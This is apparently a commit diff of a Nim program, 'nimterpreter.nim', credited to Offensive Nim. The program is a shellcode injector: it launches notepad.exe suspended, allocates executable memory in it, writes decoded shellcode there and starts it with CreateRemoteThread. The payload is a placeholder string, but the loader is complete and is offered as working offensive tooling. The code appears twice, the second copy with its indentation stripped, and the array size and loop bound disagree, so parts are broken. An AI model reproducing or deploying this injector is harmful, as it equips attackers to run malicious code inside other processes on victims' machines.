mttaggart · September 30, 2021 15:07
diff --git a/nimterpreter.nim b/nimterpreter.nim
 # With special thanks to byt3bl33d3r for Offensive Nim!
 import winim/lean
 import osproc
 import base64
 import sequtils
 import strutils

 proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

    let tProcess = startProcess("notepad.exe")
    tProcess.suspend() # That's handy!
    defer: tProcess.close()

    echo "[*] Target Process: ", tProcess.processID

    let pHandle = OpenProcess(
        PROCESS_ALL_ACCESS, 
        false, 
        cast[DWORD](tProcess.processID)
    )
    defer: CloseHandle(pHandle)

    echo "[*] pHandle: ", pHandle

    let rPtr = VirtualAllocEx(
        pHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

    var bytesWritten: SIZE_T
    let wSuccess = WriteProcessMemory(
        pHandle, 
        rPtr,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

    echo "[*] WriteProcessMemory: ", bool(wSuccess)
    echo "    \\-- bytes written: ", bytesWritten
    echo ""

    let tHandle = CreateRemoteThread(
        pHandle, 
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](rPtr),
        NULL, 
        0, 
        NULL
    )
    defer: CloseHandle(tHandle)

    echo "[*] tHandle: ", tHandle
    echo "[+] Injected"

    echo "[*] Running in x64 process"

 var sc = "Base64 Encoded string of comma-separated bytes goes here"

 var sc_seq = base64.decode(sc).split(",")
    .map(proc (h: string): string = strip(h))
    .map(parseHexInt)

 var shellcode: array[200626, byte]
 for s in 0..200261:
    shellcode[s] = byte sc_seq[s]

 # This is essentially the equivalent of 'if __name__ == '__main__' in python
 when isMainModule:
    injectCreateRemoteThread(shellcode)
	# With special thanks to byt3bl33d3r for Offensive Nim!
	import winim/lean
	import osproc
	import base64
	import sequtils
	import strutils

	proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =

	let tProcess = startProcess("notepad.exe")
	tProcess.suspend() # That's handy!
	defer: tProcess.close()

	echo "[*] Target Process: ", tProcess.processID

	let pHandle = OpenProcess(
	PROCESS_ALL_ACCESS,
	false,
	cast[DWORD](tProcess.processID)
	)
	defer: CloseHandle(pHandle)

	echo "[*] pHandle: ", pHandle

	let rPtr = VirtualAllocEx(
	pHandle,
	NULL,
	cast[SIZE_T](shellcode.len),
	MEM_COMMIT,
	PAGE_EXECUTE_READ_WRITE
	)

	var bytesWritten: SIZE_T
	let wSuccess = WriteProcessMemory(
	pHandle,
	rPtr,
	unsafeAddr shellcode,
	cast[SIZE_T](shellcode.len),
	addr bytesWritten
	)

	echo "[*] WriteProcessMemory: ", bool(wSuccess)
	echo " \\-- bytes written: ", bytesWritten
	echo ""

	let tHandle = CreateRemoteThread(
	pHandle,
	NULL,
	0,
	cast[LPTHREAD_START_ROUTINE](rPtr),
	NULL,
	0,
	NULL
	)
	defer: CloseHandle(tHandle)

	echo "[*] tHandle: ", tHandle
	echo "[+] Injected"

	echo "[*] Running in x64 process"

	var sc = "Base64 Encoded string of comma-separated bytes goes here"

	var sc_seq = base64.decode(sc).split(",")
	.map(proc (h: string): string = strip(h))
	.map(parseHexInt)

	var shellcode: array[200626, byte]
	for s in 0..200261:
	shellcode[s] = byte sc_seq[s]

	# This is essentially the equivalent of 'if __name__ == '__main__' in python
	when isMainModule:
	injectCreateRemoteThread(shellcode)